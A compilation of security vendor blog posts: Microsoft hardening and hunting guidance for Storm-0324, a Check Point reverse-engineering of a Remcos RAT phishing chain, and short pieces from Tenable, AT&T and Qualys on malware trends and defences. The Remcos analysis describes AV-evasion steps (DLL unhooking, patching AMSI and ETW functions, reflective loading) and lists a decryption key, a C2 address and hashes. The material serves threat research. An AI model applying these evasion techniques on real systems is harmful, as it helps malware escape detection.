Microsoft takes these phishing campaigns very seriously and has rolled out several improvements to better defend against these threats. In accordance with Microsoft policies, we have suspended identified accounts and tenants associated with inauthentic or fraudulent behavior. We have also rolled out enhancements to the Accept/Block experience in one-on-one chats within Teams, to emphasize the externality of a user and their email address so Teams users can better exercise caution by not interacting with unknown or malicious senders . We rolled out new restrictions on the creation of domains within tenants and improved notifications to tenant admins when new domains are created within their tenant. In addition to these specific enhancements, our development teams will continue to introduce additional preventative and detective measures to further protect customers from phishing attacks.

Recommendations

To harden networks against Storm-0324 attacks, defenders are advised to implement the following:

Pilot and start deploying phishing-resistant authentication methods for users.

Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.

Specify trusted Microsoft 365 organizations to define which external domains are allowed or blocked to chat and meet.

Keep Microsoft 365 auditing enabled so that audit records could be investigated if required.

Understand and select the best access settings for external collaboration for your organization.

Allow only known devices that adhere to Microsoft’s recommended security baselines.

Educate users about social engineering and credential phishing attacks, including refraining from entering MFA codes sent via any form of unsolicited messages.

Educate Microsoft Teams users to verify ‘External’ tagging on communication attempts from external entities, be cautious about what they share, and never share their account information or authorize sign-in requests over chat.

Educate users to review sign-in activity and mark suspicious sign-in attempts as “This wasn’t me”.

Implement Conditional Access App Control in Microsoft Defender for Cloud Apps for users connecting from unmanaged devices.

Configure Microsoft Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft Office applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links that are used in phishing and other attacks.

Enable Zero-hour auto purge (ZAP) in Microsoft Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.

Practice the principle of least privilege and maintain credential hygiene. Avoid the use of domain-wide, administrator-level service accounts. Restricting local administrative privileges can help limit installation of RATs and other unwanted applications.

Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.

For additional recommendations on hardening your organization against ransomware attacks, refer to our threat overview on human-operated ransomware.

Microsoft customers can turn on attack surface reduction rules to prevent common attack techniques:

Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Block JavaScript or VBScript from launching downloaded executable content

Use advanced protection against ransomware

Detection details

Microsoft 365 Defender

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

TrojanSpy:MSIL/JSSLoader

Trojan:Win32/Gootkit

Trojan:Win32/IcedId

Trojan:Win64/IcedId

Trojan:Win32/Trickbot

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network:

Ransomware-linked Storm-0324 threat activity group detected

Hunting queries

Microsoft 365 Defender

Possible TeamsPhisher downloads The following query looks for downloaded files that were potentially facilitated by use of the TeamsPhisher tool. Defenders should customize the SharePoint domain name (‘mysharepointname’) in the query.

let allowedSharepointDomain = pack_array(
‘mysharepointname’ //customize Sharepoint domain name and add more domains as needed for your query
);
//
let executable = pack_array(
‘exe’,
‘dll’,
‘xll’,
‘msi’,
‘application’
);
let script = pack_array(
‘ps1’,
‘py’,
‘vbs’,
‘bat’
);
let compressed = pack_array(
‘rar’,
‘7z’,
‘zip’,
‘tar’,
‘gz’
);
//
let startTime = ago(1d);
let endTime = now();
DeviceFileEvents
| where Timestamp between (startTime..endTime)
| where ActionType =~ ‘FileCreated’
| where InitiatingProcessFileName has ‘teams.exe’
or InitiatingProcessParentFileName has ‘teams.exe’
| where InitiatingProcessFileName !has ‘update.exe’
and InitiatingProcessParentFileName !has ‘update.exe’
| where FileOriginUrl has ‘sharepoint’
and FileOriginReferrerUrl has_any (‘sharepoint’, ‘teams.microsoft’)
| extend fileExt = tolower(tostring(split(FileName,’.’)[-1]))
| where fileExt in (executable)
or fileExt in (script)
or fileExt in (compressed)
| extend fileGroup = iff( fileExt in (executable),’executable’,”)
| extend fileGroup = iff( fileExt in (script),’script’,fileGroup)
| extend fileGroup = iff( fileExt in (compressed),’compressed’,fileGroup)
//
| extend sharePoint_domain = tostring(split(FileOriginUrl,’/’)[2])
| where not (sharePoint_domain has_any (allowedSharepointDomain))
| project-reorder Timestamp, DeviceId, DeviceName, sharePoint_domain, FileName, FolderPath, SHA256, FileOriginUrl, FileOriginReferrerUrl

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.

Microsoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog in addition to Microsoft 365 Defender detections list above.

Suspicious Javascript

Javascript file creation

Ransomware Triggered

Signs of Ransomware Activity

Suspicious Image Load

References

Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself

JSSLoader: Recoded and Reloaded (Proofpoint)

Further reading

Microsoft customers can refer to the report on this activity in Microsoft Defender Threat Intelligence and Microsoft 365 Defender for detections, assessment of impact, mitigation and recovery actions, and hunting guidance.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on Twitter at https://twitter.com/MsftSecIntel.

The post Malware distributor Storm-0324 facilitates ransomware access appeared first on Microsoft Security Blog.

Research by: Niv Asraf

Abstract

In the last two months, Check Point researchers encountered a new large-scale phishing campaign that recently targeted more than 40 prominent companies across multiple industries, in Colombia. The attackers’ objective was to discreetly install the notorious “Remcos” malware on victims’ computers. Remcos, a sophisticated “Swiss Army Knife” RAT, grants attackers full control over the infected computer and can be used in a variety of attacks. Common consequences of a Remcos infection include data theft, follow-up infections, and account takeover. In our report, we delve into the attack intricacies and highlight the stealthy techniques employed by the malicious actors.

Attack Flow

Fraudulent Email:

The attackers initiated the campaign by sending deceptive emails allegedly from trusted entities, including reputable financial institutions and corporations operating within Colombia. These malicious emails were crafted to appear genuine, often containing urgent notifications, reports of overdue debts, or enticing offers.

Email Contains an Archive File:

The phishing email contains an attachment that appears to be a harmless archive file, such as ZIP, RAR or TGZ. The attachment label states that it contains important documents, invoices, or other enticing information to encourage the recipients to open it.

Highly Obfuscated BAT File with PowerShell Commands:

The archive file contains a highly obfuscated Batch (BAT) file. Upon execution, the BAT file runs PowerShell commands which are also heavily obfuscated. This multi-layer obfuscation makes it difficult for security solutions to detect and analyze the malicious payload.

Loading .NET Modules:

After the PowerShell commands are deciphered, they load two .NET modules into memory. These modules are essential for the subsequent stages of the attack.

First .NET Module: Evasion and Unhooking:

The first .NET module’s primary purpose is to evade detection and unhook any security mechanisms present in the targeted system. By removing or bypassing security hooks, the attackers increase the malware’s chances of remaining undetected and enable it to operate stealthily.

Second .NET Module: Loading “LoadPE” and Remcos:

The second .NET module dynamically loads another component called “LoadPE” from the file resources. “LoadPE” is responsible for reflective loading, a technique that allows the loading of a Portable Executable (PE) file (in this case, the Remcos malware) directly into memory without the need for it to be stored on the disk.

Reflective Loading with “LoadPE”:

Using the “LoadPE” component, the attackers load the final payload, the Remcos malware, directly from their resources into the memory. This reflective loading technique further enhances the malware’s ability to evade traditional antivirus and endpoint security solutions, as it bypasses standard file-based detection mechanisms.

The Final Payload: Remcos – Swiss Army Knife RAT:

With the successful loading of the Remcos malware into memory, the attack is now complete. Remcos, a potent Remote Administration Tool (RAT), grants the attackers full control over the compromised system. It serves as a Swiss Army Knife for the attackers, allowing them to execute a wide range of malicious activities, including unauthorized access, data exfiltration, keylogging, remote surveillance, and more.

Technical Analysis

In the following sections, we examine the technical aspects of the observed issues. We focus on the malware’s evasion techniques and the deobfuscation process we employed to uncover the true nature of the BAT and .NET modules.

Our analysis starts with the malicious BAT file from attack chain stage 3 above.

After deobfuscating parts of the BAT file code with a Python script, the only thing we’re interested in is the last two lines of code:

Figure 4:The last two lines of deobfuscated BAT file.

The first line is responsible for copying the PowerShell executable to the current folder, abusing a double extension in the filename in order to hide the true file type.

And the second line of code looks like a heavily obfuscated PowerShell code.

After we organized and deobfuscated the PowerShell code, this is what we got:

Figure 5: Deobfuscated PowerShell code.

There are two functions here:

“Zoskj” is responsible for decrypting the payload using AES CBC mode.

“oPueH” uses GZIP to decompress it.

The flow is to first decode the Base64, and then decrypt it using AES. The last step is to decompress it.

AES key: Bh25J//GchqJk6Loyw9E05onwOgPl+4pjflSE6q18Hk=

AES IV: dQVwOVWNZWJ4TULVM0QMqQ==

Finally, after resolving the two .NET executables, they are both loaded in the memory:

Figure 6: Load 2 .NET executables to the memory

We wanted to see why the attackers split the payload into two .NET executables and if there is a meaning to the order in which they are loaded.

Looking at the first .NET executable, we can see that it is highly obfuscated and almost unreadable.

Figure 7: First .NET obfuscated executable.

While this obfuscation is unknown, we can still use “de4dot” to make it a little bit more readable and then perform further deobfuscation.

de4dot is an open source (GPLv3) .NET deobfuscator and unpacker written in C#.

Figure 8: First .NET obfuscated executable after using de4dot.

The prominent pattern we observed involves deliberately enlarging the size of the code making it more complicated by extensively using Math.Abs/Min methods and adding numerous parentheses. Fortunately, we do not need to perform actual calculations; the values inside these methods directly serve as the final parameters passed into the “smethods_*” functions.

The first interesting thing we noticed here is the unknown strings (outlined in red in Figure 8) that are always passed into “smethod_0”. From this we understand that it is probably a string decryption function.

Looking at the function itself, we can see that only the string_0 and int_1 arguments are being used in the “for” loop, which is the only part of the code that is relevant here.

Basically, the function takes each “char” from the strings, turns it into an int and subtracts from it the int_1 argument, then converts the resulting value to char and appends it to the “stringBuilder”.

We created our own string decryption method in Python:

Figure 10: String decryption method in Python.

In the Figure 10 example, the return value is “ntdll.dll”.

So now, we can decrypt all unknown strings.

In addition, before the “Main” function executes, we see a lot of dynamically resolved functions assigned to delegated pointer variables to use in the code.

If we decrypt those strings, we can understand what the functions are, and rename the obfuscated delegated names.

Figure 11: Example of the “CloseHandle” function pointer being assigned.

After resolving and renaming, we get these function variables:

Figure 12: Decrypted delegated function pointers.

Now that we decrypted all the pointers, we can reverse-engineer the other methods and understand the flow of the main function.

Let’s analyze the function that receives the decrypted string “ntdll.dll”.

Figure 13: Choose the right ntdll based on IsWow64Process.

Looking at the first chunk of code, we can see two encrypted strings which translate to:

“C:WindowsSystem32” and “C:WindowsSysWOW64”

We also see a delegated function pointer that we resolved earlier, IsWow64Process.

This checks whether the process runs under wow64, so we can use the right ntdll to read from the disk.

Figure 14: Unhooking DLL.

Although this function is still obfuscated, we can analyze and understand the code’s purpose, which is unhooking DLLs that are received as an argument to the function.

This is what happens here:

Get a handle to the already-hooked library.

Map a fresh copy of the relevant DLL into memory.

Replace the .text section of the hooked DLL with the new one from the disk.

Figure 15: Unhooking.

VirtualProtect is used to change the .text section protection, using memcpy to copy the new unhooked section, and finally return to the old protection.

Now we can safely change the function name to UnhookModule.

This is the last major function of this executable:

Figure 16: Patching functions in memory with code that returns an error code.

This function takes a few arguments: Dll Name, Function Name, and a Byte Sequence.

It is responsible for patching functions in memory with code that returns an error code: 0x80070057 “The parameter is incorrect”.

To summarize, this is the first .NET Main Functionality:

Unhooking kernel32.dll

Unhooking ntdll.dll

Patching the amsi.dll AmsiScanBuffer function to return “The parameter is incorrect” code (0x80070057)

Patching the ntdll.dll EtwEventWrite function to return “The parameter is incorrect” code (0x80070057)

The second .NET is also heavily obfuscated but now the code size is much smaller. In addition, now that we understand the way the obfuscation works, it is much easier to understand its content.

Figure 17: Reversed and deobfuscated second .NET module.

To summarize, this is the second .NET Main Functionality:

Check if there is a debugger.

Use PowerShell to wait for the process to end and then delete the main module file.

Load two additional files from the resources:Remcos malware

LoadPE .NET executable

At the end of the Main function, the final payload, Remcos, is assigned to the “array” variable and then is passed as an argument to another invoked .NET executable, the “LoadPE” exe, which is responsible for getting an executable as an argument and loading it using reflective loading.

As we mentioned earlier in this report, reflective loading is used to dynamically load a library or executable directly into memory without relying on the standard operating system mechanisms for loading files from the disk.

In malware, reflective loading is often employed as a stealthy way to execute malicious code without writing any files to the disk. This makes it harder for traditional security tools to detect the presence of the malware as there are no files that can be scanned or monitored. Reflective loading also makes it harder to identify and analyze the malicious code.

The third LoadPE .NET executable is not obfuscated at all, which means we can easily reverse-engineer and understand what it’s used for.

These are its functions:

Figure 18: LoadPE .NET functions.

The final payload, the Remcos malware, stores its encrypted configuration file, called “SETTING”, in the resources.

We can easily see the configuration in memory:

Figure 19: Remcos configuration in memory.

Summary of the Remcos configuration:

Host:Port:Password: “192[.]161[.]184[.]21:24050:1”

Assigned name: “Vps”

Copy file: “remcos.exe”

Startup value: “Remcos”

Mutex: “Rmcvps-JUECXT”

Keylog file: “vpslogs.dat”

Screenshot file: “Screenshots”

Audio folder: “MicRecords”

Copy folder: “Remcos”

Keylog folder: “vp”

Keylog file max size: “100000”

We wanted to see if our assumptions were correct, so we entered the word “password” and also ”xxxx” and “123123”, then checked the keylogging file. As you can see, we were right.

Figure 20: Keylogging in action.

Conclusion

Our analysis offers a glimpse into the intricate world of evasion techniques and deobfuscation procedures employed by attackers. By deciphering the hidden functionalities of the malicious BAT and .NET modules, we were able to shed light on the attack flow’s complexity. Understanding these technical intricacies is essential for enhancing cybersecurity defenses and devising effective countermeasures to protect against such advanced phishing campaigns.

Check Point customers remain protected from the threats described in this research.

Check Point’s Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems and has developed and deployed a signature to detect and protect customers against threats described in this research.

Threat Emulation:

Technique.Win.Unhooking.B

Technique.Win.WrongFileExt.A

Technique.Win.UnhookingNtdll.A

IOCs

C2 IOC:192[.]161[.]184[.]21

BAT IOC’s:dbc8cd0d565c9fa45a0f0ce030f609cfbc8dcc49747c2466b4f4b5024f321a07fca597824d2483f83903cd20c6e72582f0ce3457a8964c6d9bc7496d091a54d15376e86860ed52f3dcb5d3ded457e6695d41cad361e530512a4bc8f394f5447fdcd19c1b66e261009a745aeb0ed753cc920fca12880d51536bd967409c612466686e60dd409183a014171bf484668e4bb3b9366a8fd0856a6dc2a76a341589db879b86cdf85c67b99c2f45afbaba8e4967a360650f0e747e23c98467bf825f8ef0dd1ab2eacb11691b9d6935421026676f2e39332894e614067681004d83ca1c2133425e1f87ea4729f40f17beeac8e25183b062a48926e20deef57a4d1819be62985803796b5b5f2a9bffb777b46066e7167813dc53d3449ec5ece2add690e3bca1a7ef84a73e10e326f39fe543fd34e50bba41b422095dae1582d3e90718a3

RAR IOC’s:ef1cc1750f5f580aa9338b8c5c5125cfd8406f7b06c4ae8f298943340466a5dd1a6d44491349dc89cf175cf4550280e43c6b094561fbe2925808a86e1af2877ea0f103c0eb7a022616274b06dff387b130c4ede9a6f31c88b2ae1c0934a6be2dd85c4fcb3b1d15c94f8a444cdeded4cb1fdc67835a3eb22f4ad0661ce27ad4e738fac9df6399dade735aab7559358571cc8679f945477d4616b853081e90f128a0e0dd39ea5af2fc05fa0381d7f690840f726237a738e73eb43b2b13d571bbec921364ef7c0fe89bc464353ea1206bf98d74294846d44dcc77abd266de47ac28807ef5ddf0baac89b833d629365b69faf0225203ef06dd74c5619e787bcb842bfee21715f637469861d7933ca1e0b5940cd65008fe852ae607106f6c27f3f9111f6772be99c13a6d4c9086f90eb80eca7ce0ce7eb2247e5bc4f1fca0050c6c9a10b4b1042cecb095b4290b585f3813d962363b80114fdf1d2bb70d0701c3843a1ef6b85c312cb293137424047b1b536d84fa67b57af530c2d0f7e1031d50d5066bb37491b56c05b196a569740b1dfae01e7535f915f5feaa3efa9454595143287620d2dd1f617be60cf587d9b4148b99330fe41ec13f9a0f21f1c5fec49abbe72669d0b24332c1dc19655afc273aad18bc2b709926857dfeb2004a6023e3801f289da12f6a23df7ceec631db4222138934973f172990974b141cbd7f93331dc7ae99c8ce007688292cc559b88c1417bb706c1bdf2da899c4a906b96f2e03467eb027b820d6414377c4cde1faed41f53d2f82901f0467e2c1ca4c876f0718ab0054ee86652facc6928c6e6e1d934c342f8d0ecdb590227f6e3030026cf11a87685b53b4339de628012a4ebb8c32923f96042f5288a47bf44e6a70a2ad1a88e40e33b3128ec42305c9df027a1b27ec776f875491783de22926115f4232b1fed26a4ea45dc9c8ad551f3f92880d212006e2812dd11b945893616305bd654094f97258442bc1df5047fbd08b2e4cdf707788432dc5cf8b64c591b8d5d80c6c94879b41fbcb25446343828f9ea0c3da92e88401b06dcad2564efc476f4ebc66a430e5211a45d3fd987e06adbb87e14a76ba6b31fb4afded84a31aac37961333221d4e52ec5ca7ebfed9fd46e6995f295da9b58f8d0db756b41bfebfefe17fdb3f983c88b6ba1e509f467356fa7cece82be67830de5fda699fb4e8fb8c8ab85eb95c21bc3171b7e7a72d015d632d7cd92eeff5631ce6b5704cba5087d8bb1f7ec294f1838f875a6b6b98ce05a28d2089f40f814bd488f9d044b2ac6d59089e1bd588e5dff8ddc22a7b5d489bb230996fa5b9e94f0ad29807fdf54fe686407988d2267570a82522c0ff3d0ff1034cb75eb4c655fee8f16d72db30e960256be5723cf497671af031b99da70278fc5666b1599fb45a8de9ead18c0c88762b3fb07a982b71d4f3c9c280922b3a7446d5b37aea9ea57f034c654586f36718b0d8e2cf20898a2434b9be7f3c4ea235a975d7373263b9122bc5f1b4014dc78136a49c3688c2205936dd87bb9fb0713969e74c841e5093c48ff58949956a76638928f3a70dea0985fda5b03b10c5ca740d8b402623e74bf47a14598a8b6182bf00f584446d8f5251fc10bc3e634e418f92c596c39bb90ede4434984e20ce9910b1516190a7c84ca422b2a03d5be16b90805bb298f31ddb90b44246a15df7ce331475cecdb32b907958c0179417bb08836439b05e950bc397a7fcc1b6d65c3e95aa52f8d8c9e2cc3f7e408a12c9b547efabef5f9aaf87c7bd580bcde421bd45149534e1e94e5052a3e4b4f0f6572b50ed72683ebef08d4f3ae9b28ea4f5c257bbc2d231b62c54dbf1948475eeeae01da7a22b1637710ee68fe966c72a1efbef4b04f94fafcc5ffd986c8a3097644db452f478318df175e3b37b50f13fe9c7e749b3ccdc5cb27a5c75f563e8b95f28e3e371c4e3bcfaf5d125b108ce0882492ec184116dc08189023ca32d80a5f683c5230aa2d5c7fdc4e9085dd5c9277fae611a5346e1ed822e05cc136bc74eaa921fb852140b9d9fda9ea9bc9d57ce7acbe0e521474fdcc337e6b6e93bd45e1f0e01d01aeb3b10ed5f39623eaa2be7a5d45b4eb9daf3d2cace3f1a8f7399b56df20af8c6cc73721c7437d31f0105aaf6a63c9e74474c25a58fd876efa7a0d5d6ca1af6f85497a600dec6068a179999f53ebed67ebf4f01fc1c6cb1089402cd4a75b4afae2907d833ec0f14bfc04ba0739387844e6971d879fd73d8d1840820cb74e3a40d09e6123aba21735fc0c4d8e9eb2b5db47efd11066826c21e0300610d1871db936d1615f6bb43c70af75b48f9a188ddd616b4dc5898884939ac85426c75c053b4248fbc157d59de89d77a580333433dad82418e94277288eeac3ce08d2d4008b7aef450428400516c6642ddac7ccde2dfed7211a9277b4e43259cededb73b2bed90cee8162589c2594823a9847495389d6d3edeaea679e95f2c4cd4bc70c8571c951ac7bc0578d22847aaee25058728ee4b1fcbe45c39d06d8b577f5d3cd2f185ce72e88cafcf94ad96f5f71278daa2a5c1e6f3b5d39e69712947dcdc71d5738518caf53a8d98f4a1652c439b0a46218f08a11c913cab04895d84fb52f09ca044e707dc435417c8fdd3a9e9949bee

The post Guarding Against the Unseen: Investigating a Stealthy Remcos Malware Attack on Colombian Firms appeared first on Check Point Research.

What matters most to security leaders in 2023? Why is CISA urging AI vendors to apply secure by design practices to software products? What are the top 3 malware variants in Q2 2023?

We’ve got you covered in this week’s edition of the Tenable Cyber Watch, our weekly video news digest highlighting three cybersecurity topics that matter right now.

Here’s what’s happening in cyber. Today, we’re talking:

All about what security leaders say they’re choosing to prioritize
Why CISA is urging AI vendors to apply secure by design practices to software products
The top 3 malware variants of Q2 2023

Every Monday at 9am ET, the Tenable Cyber Watch brings you cybersecurity news you can use. Watch this week’s episode below and subscribe to our playlist on YouTube.

tn%20option%201_0.jpg

Check Point Research reported on a new ChromeLoader campaign named “Shampoo” which targets Chrome browser users with malware-loaded fake ads. Meanwhile, the communications sector jumped up the list to the second most impacted industry over healthcare Our latest Global Threat Index for August 2023 saw researchers report on a new variant of the ChromeLoader malware, which has been targeting Chrome browser users with fake ads loaded with malicious extensions. Meanwhile, the communications sector ranked as the second most impacted industry globally, knocking healthcare off the list for the first time this year. ChromeLoader is a persistent Google Chrome browser […]

The post August 2023’s Most Wanted Malware: New ChromeLoader Campaign Spreads Malicious Browser Extensions while QBot is Shut Down by FBI appeared first on Check Point Blog.

The content of this post is solely the responsibility of the author. AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.

Here’s how organizations can eliminate content-based malware in ICS/OT supply chains.

As the Industrial Internet of Things (IIoT) landscape expands, ICS and OT networks are more connected than ever to various enterprise systems and cloud services. This new level of connectivity, while offering benefits, also paves the way for targeted and supply chain attacks, making them easier to carry out and broadening their potential effects.

A prominent example of supply chain vulnerability is the 2020 SolarWinds Orion breach. In this sophisticated attack:

Two distinct types of malware, “Sunburst” and “Supernova,” were secretly placed into an authorized software update.
Over 17,000 organizations downloaded the update, and the malware managed to evade various security measures.
Once activated, the malware connected to an Internet-based command and control (C2) server using what appeared to be a harmless HTTPS connection.
The C2 traffic was cleverly hidden using steganography, making detection even more challenging.
The threat actors then remotely controlled the malware through their C2, affecting up to 200 organizations.

While this incident led to widespread IT infiltration, it did not directly affect OT systems.

In contrast, other attacks have had direct impacts on OT. In 2014, a malware known as Havex was hidden in IT product downloads and used to breach IT/OT firewalls, gathering intelligence from OT networks. This demonstrated how a compromised IT product in the supply chain could lead to OT consequences.

Similarly, in 2017, the NotPetya malware was concealed in a software update for a widely-used tax program in Ukraine. Though primarily affecting IT networks, the malware caused shutdowns in industrial operations, illustrating how a corrupted element in the supply chain can have far-reaching effects on both IT and OT systems.

These real-world incidents emphasize the multifaceted nature of cybersecurity risks within interconnected ICS/OT systems. They serve as a prelude to a deeper exploration of specific challenges and vulnerabilities, including:

Malware attacks on ICS/OT: Specific targeting of components can disrupt operations and cause physical damage.
Third-party vulnerabilities: Integration of third-party systems within the supply chain can create exploitable weak points.
Data integrity issues: Unauthorized data manipulation within ICS/OT systems can lead to faulty decision-making.
Access control challenges: Proper identity and access management within complex environments are crucial.
Compliance with best practices: Adherence to guidelines such as NIST’s best practices is essential for resilience.
Rising threats in manufacturing: Unique challenges include intellectual property theft and process disruptions.

Traditional defenses are proving inadequate, and a multifaceted strategy, including technologies like Content Disarm and Reconstruction (CDR), is required to safeguard these vital systems.

Supply chain defense: The power of content disarm and reconstruction

Content Disarm and Reconstruction (CDR) is a cutting-edge technology. It operates on a simple, yet powerful premise based on the Zero Trust principle: all files could be malicious.

What does CDR do?

In the complex cybersecurity landscape, CDR stands as a unique solution, transforming the way we approach file safety.

Sanitizes and rebuilds files: By treating every file as potentially harmful, CDR ensures they are safe for use while maintaining full functionality.
Removes harmful elements: This process effectively removes any harmful elements, making it a robust defense against known and unknown threats, including zero-day attacks.

How does it work?

CDR’s effectiveness lies in its methodical approach to file handling, ensuring that no stone is left unturned in the pursuit of security.

Content firewall: CDR acts as a barrier, with files destined for OT systems relayed to external sanitization engines, creating a malware-free environment.
High availability: Whether on the cloud or on-premises in the DMZ (demilitarized zone), the external location ensures consistent sanitization across various locations.

Why choose CDR?

With cyber threats becoming more sophisticated, CDR offers a fresh perspective, focusing on prevention rather than mere detection.

Independence from detection: Unlike traditional methods, CDR can neutralize both known and unknown malware, giving it a significant advantage.
Essential for security: Its unique approach makes CDR an indispensable layer in critical network security.

CDR in action:

Beyond theory, CDR’s real-world applications demonstrate its ability to adapt and respond to various threat scenarios.

Extreme processes: CDR applies deconstruction and reconstruction to incoming files, disrupting any embedded malware.
Virtual content perimeter: Positioned outside the network, in the DMZ, it blocks malicious code entry through email and file exchange.
Preventative measures: By foiling the initial access phase, CDR has been shown to deliver up to 100% prevention rates for various malware.

Integration possibilities:

CDR technology can be seamlessly integrated into various network security modules.

Secure email gateways: Enhances email security by integrating with existing systems, providing an additional layer of protection.
USB import stations: Offers controlled access to USB devices, ensuring that only sanitized content is allowed.
Web-based secure managed file transfer systems: Enables comprehensive coverage of file transfers, ensuring sanitized content at every step.
Firmware and software updates: Aims to cover all content gateways, securing a ‘sterile area’ behind these modules, including essential updates.

NIST’s guidelines that call for the adoption of CDR

The National Institute of Standards and Technology (NIST) has outlined specific guidelines that highlight the importance of CDR. In the NIST SP 800-82 Revision 3 document, the emphasis on CDR’s role is evident:

1. Physical access control:

Portable devices security: Under the section ‘6.2.1.2 Physical Access Controls (PR.AC-2),’ the guidelines stress that organizations should apply a verification process to portable devices like laptops and USB storage. This includes scanning for malicious code before connecting to OT devices or networks, where CDR can play a vital role in ensuring safety.

2. Defense-in-depth strategy:

Multi-layered protection: Under section 5.1.2, the document defines defense-in-depth as a multifaceted strategy. It states: ‘a multifaceted strategy integrating people, technology, and operations capabilities to establish variable barriers across multiple layers and dimensions of the organization.’ This approach is considered best practice in the cybersecurity field.
Widespread adoption: The quote continues, emphasizing that ‘Many cybersecurity architectures incorporate the principles of defense-in-depth, and the strategy has been integrated into numerous standards and regulatory frameworks.’ This highlights the broad acceptance and integration of this strategy in various cybersecurity measures.
OT environments: This strategy is particularly useful in OT environments, including ICS, SCADA, IoT, IIoT, and hybrid environments. It focuses on critical functions and offers flexible defensive mechanisms.
CDR’s role in defense: CDR contributes to this defense-in-depth approach, especially in handling content with browser isolation solutions. Its role in enhancing security across different layers of the organization makes it a valuable asset in the cybersecurity landscape.

Mitigating the risks

The SolarWinds breach was a frightening sign of what has already begun, and it might just be a small part of what’s happening now. With criminal groups capitalizing on the increasing cloud connectivity at ICS/OT sites, attacks on hundreds or even thousands of organizations simultaneously are actual risks we face today.

But amid these challenges, there’s a solution: CDR. This cutting-edge technology offers a robust defense against the known and unknown, providing a shield against malicious forces that seek to exploit our interconnected world. In the ongoing battle against malware, CDR stands as a vigilant sentinel, ever ready to protect.

Qualys Blog Series – 2023 TotalCloud Security Insights by the Threat Research Unit

The 2023 TotalCloud Security Insights report from the Qualys Threat Research Unit (TRU) provides research insights, best practices, and detailed recommendations organized by five separate Risk Facts. The insights will enable organizations using cloud technologies to better understand these risks and how they can be better prepared to face those challenges in today’s threat landscape.

Read the previous blog in this series: External-Facing Vulnerabilities Cloud Security Research Risk Fact

Threats Known to Exploit High-Risk Assets

The data show that crypto mining and malware are the two most significant threats to cloud assets; both are designed to provide a foothold in your environment or facilitate lateral movement.

The critical damage caused by crypto mining is based on the wasted cost of compute cycles. Miners seek to use your cloud to create crypto coins and do not plan to deposit the coins in your account! An unmitigated crypto mining attack could cost your organization millions due to energy and cloud resource allocation fees. It also displaces your organization’s use of the resources it is paying for.

Not accounting for generic coin mining software such as XMRig, the top three malware categories in cloud infrastructures observed were AndroxGh0st/Legion RCE, Denonia, and SCARLETEEL. The data show the bulk of malware that will impact an insecure cloud asset is some variant of the crypto miner, many of which are generic and a few of which have received names — like Denonia.

Denonia

Denonia malware is an exciting use case as it is the first malware strain to specifically target AWS Lambda. There are no controls currently in the CIS Hardening Benchmark for AWS that cover Lambda specifically, outside of enabling IAM Access Analyzer, which examines permissions provided to Lambda functions.

Looking at controls outside of CIS benchmarks, Lambda reflects the overall hardening stance for AWS, and the 15 monitored controls are passing at 56.8%.

Below, we look at seven of those controls that are failing more than 50% of the time.

Fig.1 AWS Lambda Configuration Fail Rates

Getting a Foothold — AndroxGh0st/Legion RCE, SCARLETEEL

In addition to crypto miners, the data show the use of AndroxGh0st and SCARLETEEL. AndroxGh0st works by targeting .env files to gain access to sensitive information such as high-permission credentials, allowing the attacker to move laterally through your organization.

SCARLETEEL specifically targets high-risk external-facing cloud assets to gather credentials and subsequently launch a credential-stuffing attack for lateral movement and exploitation of your cloud environment. Some attacks could eventually affect your on-premises assets.

SCARLETEEL also specifically targets Lambda functions to achieve its purpose.

AndroxGh0st/Legion RCE

The AndroxGh0st malware is written in Python and usually targets Simple Mail Transfer Protocol (SMTP) to enable spamming. AndroxGh0st specifically targets cloud environments — in particular, AWS secrets — and exploits vulnerabilities in web applications running in the cloud to maintain a foothold.

Just one vulnerability, CVE-2017-9841, in PHPUnit has been associated explicitly with AndroxGh0st. However, after getting a foothold, the malware will programmatically attempt to maintain persistence in AWS by creating accounts and enabling permissions.

Fig.2 Controls Abused by AndroxGh0st

Leveraging Deep Learning AI to Detect Advanced Malware

Exploitation is where the adversaries’ public stories begin. When risk-reward is excellent enough, exploitation is a consequence. For defenders, the challenge is discovering and eradicating stealthy malware commonly found in Linux containers, which can evade detection for months. Legacy signature-based techniques simply cannot create and deploy signatures fast enough to prevent malware from infiltrating enterprise clouds.

A new approach is required using deep learning AI technology to quickly discover advanced malware in containers and complex network traffic flows. Deep learning is vital for enabling the sub-second detection of advanced zero-day malware, which refers to previously unknown and unseen malicious software that exploits vulnerabilities in cloud systems. Without this capability, high-risk cloud assets are ripe for exploitation.

Critical Insights from Risk Fact 4

Findings by the Threat Research Unit reveal a substantial risk of advanced malware in enterprise clouds. The most significant threats to cloud assets are crypto mining and malware, which provide a foothold in your environment or facilitate lateral movement. Detecting these threats quickly requires faster capabilities than legacy signature-based tools. A modern approach using deep learning AI can provide sub-second detection of advanced malware. Without this capability, cloud security has a substantial elevation of risk.

To learn more about the five cloud security Risk Facts and detailed recommendations, download your copy of Qualys 2023 TotalCloud Security Insights.

Read the next blog in this series: Keeping the pace of remediation at a cloud scale requires automation.

